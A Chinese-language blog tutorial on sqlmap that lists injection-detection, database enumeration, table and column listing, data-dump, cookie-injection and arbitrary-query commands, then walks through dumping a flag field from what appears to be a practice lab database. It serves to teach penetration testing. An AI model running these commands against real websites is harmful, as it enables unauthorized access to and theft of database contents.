【SQLMAP】02 实战

一、常用命令
检查注入点 sqlmap -u "http://ooxx.com/a.php?id=1" 
列数据库信息 sqlmap -u "http://ooxx.com/a.php?id=1" --dbs 
指定数据库名列出所有表 sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname --tables 
指定数据库名表名列出所有字段 sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tablename --columns 
指定数据库名表名字段dump出指定字段 sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tablename -C columnname --dump 
cookie 注入      --cookie=COOKIE                 在需要登录的地方,需要登录后的cookie 
执行指定的 SQL 语句 --sql-query=QUERY 
代理注入 --proxy="http://127.0.0.1:8087"
 
二、找到目标数据的过程
=>先确定数据在哪个数据库
=>再确定是数据库中的哪一张表
=>确定表里分别有哪些字段
=>最后根据字段来取出指定数据
 
三、实战
1、检查注入点
sqlmap -u "http://ooxx.com/a.php?id=1"
(2)打开sqlmap的快捷方式
(3)输入命令,检查注入点:
python sqlmap.py -u "目标地址"
 
2、列数据库信息
sqlmap -u "http://ooxx.com/a.php?id=1" --dbs
python sqlmap.py -u "目标地址" --dbs
 
3、指定数据库名列出所有表
sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname --tables
(1)拿到2、查询到的数据库名
// information数据库是预设的数据库一般不在此处
information_schema
twosecu1_vuln_02
(2)替换如下命令中的dbsname
python sqlmap.py -u "目标地址" -D twosecu1_vuln_02 --tables
(3)结果
 
4、指定 数据库名 表名,列出所有字段
sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tablename --columns 
(1)拿到3、查询到的数据表名:book、hacker
python sqlmap.py -u "目标地址" -D twosecu1_vuln_02 -T book --columns
python sqlmap.py -u "目标地址" -D twosecu1_vuln_02 -T hacker --columns
(2)结果
 
5、指定数据库名表名字段dump出指定字段
sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tablename -C columnname --dump
(1)拿到4、查询到的字段名diary、id(实际场景是破解日记中的内容,so选择diary)
python sqlmap.py -u "目标地址" -D twosecu1_vuln_02 -T hacker -C diary --dump
(2)原文件
(3)通过sql注入查询到的文件
(4)获得目标字段:XhacKer_d1aryX
6、cookie 注入
--cookie=COOKIE 在需要登录的地方,需要登录后的cookie 
7、执行指定的 SQL 语句
--sql-query=QUERY
8、代理注入
--proxy="http://127.0.0.1:8087"
参考:
 https://zhishihezi.net/b/03c82a3d82cdf5a1d066e0e2423e48dd#start

原文地址:https://www.cnblogs.com/guoccf/p/14550629.html